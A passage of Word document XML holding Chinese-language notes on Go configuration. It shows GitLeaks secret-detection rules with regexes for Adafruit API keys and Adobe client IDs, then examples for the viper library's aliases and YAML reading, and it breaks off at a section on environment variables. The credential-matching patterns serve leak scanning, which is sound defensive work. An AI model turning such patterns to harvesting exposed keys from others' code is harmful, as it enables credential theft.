      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB10DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Allowlist struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C30ABC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Regexes   []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7FB254" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Paths     []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE906CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Commits   []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6A87C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>StopWords []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A77EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1287F254" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04684694" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6848E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，其配置内容如下，是多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[[Rules]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC07A30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491C61D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># [ GitLeaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原本的规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E29693" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB76FF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[[rules]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EA25A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>description = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用凭证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--Adafruit API Key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B7583F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id = "adafruit-api-key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC144FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regex = '''(?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|&gt;|:=|\|\|:|&lt;=|=&gt;|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FE75D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secretGroup = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBABA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keywords = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36543F51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "adafruit",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DDBC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4EA23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8704D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[[rules]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0F0C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>description = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用凭证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--Adobe Client ID (OAuth Web)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B14812" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id = "adobe-client-id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26D592" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regex = '''(?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|&gt;|:=|\|\|:|&lt;=|=&gt;|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC259E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secretGroup = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C0799" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keywords = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC5353" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "adobe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975495A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BF65C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B76FA38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6A052B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置别名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34551FC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B026D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.RegisterAlias("loud", "Verbose")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF36B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6872C2D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.Set("verbose", true) // same result as next line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A90946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.Set("loud", true)   // same result as prior line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D57622" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6821B690" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.GetBool("loud") // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065A5B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.GetBool("verbose") // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692B9BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EC6F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A762561" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.Reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取配置，例：读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bindata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包文件到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184B642" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B50C869" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.SetConfigType("yaml") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// or viper.SetConfigType("YAML")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05253419" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4C4F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// any approach to require this configuration into your program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AAA2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>yamlExample</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = []byte(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEF6D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Hacker: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42402098" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>name: steve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F518B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>hobbies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5811AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>- skateboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AAB498" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>- snowboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF2593" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>- go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB16A12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>clothing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EFD12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  jacket: leather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F6EC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  trousers: denim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C9E74A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>age: 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAECA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>eyes : brown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4315BCBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>beard: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F6014A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C45ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29339155" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>viper.ReadConfig(bytes.NewBuffer(yamlExample))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B23A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557372DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper.Get("name") // this would be "steve"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A8723" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EF3769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D8DFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DACEA65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">func init() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8E343" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
